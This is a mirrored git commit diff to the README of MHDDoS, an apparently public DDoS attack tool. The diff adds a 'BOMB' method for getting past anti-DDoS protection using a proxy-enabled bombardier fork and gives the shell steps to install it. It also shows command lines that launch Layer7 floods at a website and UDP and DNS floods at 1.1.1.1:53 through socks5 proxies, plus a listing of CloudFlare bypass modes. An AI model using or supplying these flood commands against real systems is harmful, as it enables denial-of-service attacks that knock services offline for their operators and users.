mirror of
https://github.com/MatrixTM/MHDDoS.git
synced 2024-11-16 11:42:42 +08:00
Update README.md
This commit is contained in:
parent
121dd4f6c0
commit
469ade87ab
20
README.md
20
README.md
|
@ -39,6 +39,7 @@
|
||||||
* <img src="https://techcrunch.com/wp-content/uploads/2019/06/J2LlHqT3qJl0bG9Alpgc-1-730x438.png?w=730" width="16" height="16" alt="CloudFlare"> CFB | CloudFlare Bypass
|
* <img src="https://techcrunch.com/wp-content/uploads/2019/06/J2LlHqT3qJl0bG9Alpgc-1-730x438.png?w=730" width="16" height="16" alt="CloudFlare"> CFB | CloudFlare Bypass
|
||||||
* <img src="https://techcrunch.com/wp-content/uploads/2019/06/J2LlHqT3qJl0bG9Alpgc-1-730x438.png?w=730" width="16" height="16" alt="CloudFlare UnderAttack Mode"> CFBUAM | CloudFlare Under Attack Mode Bypass
|
* <img src="https://techcrunch.com/wp-content/uploads/2019/06/J2LlHqT3qJl0bG9Alpgc-1-730x438.png?w=730" width="16" height="16" alt="CloudFlare UnderAttack Mode"> CFBUAM | CloudFlare Under Attack Mode Bypass
|
||||||
* <img src="http://iclouddnsbypass.com/wp-content/uploads/2015/02/iCloudDNSBypassServer.ico" width="16" height="16" alt="bypass"> BYPASS | Bypass Normal AntiDDoS
|
* <img src="http://iclouddnsbypass.com/wp-content/uploads/2015/02/iCloudDNSBypassServer.ico" width="16" height="16" alt="bypass"> BYPASS | Bypass Normal AntiDDoS
|
||||||
|
* <img src="https://cdn-icons-png.flaticon.com/512/905/905568.png" width="16" height="16" alt="bypass"> BOMB | Bypass with codesenberg/bombardier
|
||||||
|
|
||||||
|
|
||||||
* 🧨 Layer4:
|
* 🧨 Layer4:
|
||||||
|
@ -92,6 +93,20 @@ You can download it from [GitHub Releases](https://github.com/MHProDev/MHDDoS/re
|
||||||
* [dnspython](https://github.com/rthalley/dnspython)
|
* [dnspython](https://github.com/rthalley/dnspython)
|
||||||
* [yarl](https://github.com/aio-libs/yarl)
|
* [yarl](https://github.com/aio-libs/yarl)
|
||||||
---
|
---
|
||||||
|
Optional
|
||||||
|
* [bombardier with proxy](github.com/mariotrucco/bombardier@78-add-proxy-support)
|
||||||
|
|
||||||
|
**Bombardier with proxy installation**
|
||||||
|
|
||||||
|
```shell script
|
||||||
|
mkdir bombardier_tmp
|
||||||
|
cd bombardier_tmp
|
||||||
|
go mod init bombardier_tmp
|
||||||
|
go mod edit -replace github.com/codesenberg/bombardier=github.com/mariotrucco/bombardier@78-add-proxy-support
|
||||||
|
go get github.com/codesenberg/bombardier
|
||||||
|
cd ..
|
||||||
|
rm -r bombardier_tmp
|
||||||
|
```
|
||||||
|
|
||||||
**Videos**
|
**Videos**
|
||||||
|
|
||||||
|
@ -125,12 +140,13 @@ pip3 install -r requirements.txt
|
||||||
* Layer7 (Website):
|
* Layer7 (Website):
|
||||||
```console
|
```console
|
||||||
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100
|
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100
|
||||||
|
python3 start.py bomb https://example.com 5 50 socks5.txt 100 100
|
||||||
```
|
```
|
||||||
|
|
||||||
* Layer4 (Server/Home):
|
* Layer4 (Server/Home):
|
||||||
```console
|
```console
|
||||||
python3 start.py udp 1.1.1.1:53 1 100
|
python3 start.py udp 1.1.1.1:53 1 100 socks5.txt 5
|
||||||
python3 start.py dns 1.1.1.1:53 1 100 dns.txt
|
python3 start.py dns 1.1.1.1:53 1 100 socks5.txt 5 dns.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
* Debug Mode (L4/L7):
|
* Debug Mode (L4/L7):
|
||||||
|
|
Loading…
Reference in New Issue
Block a user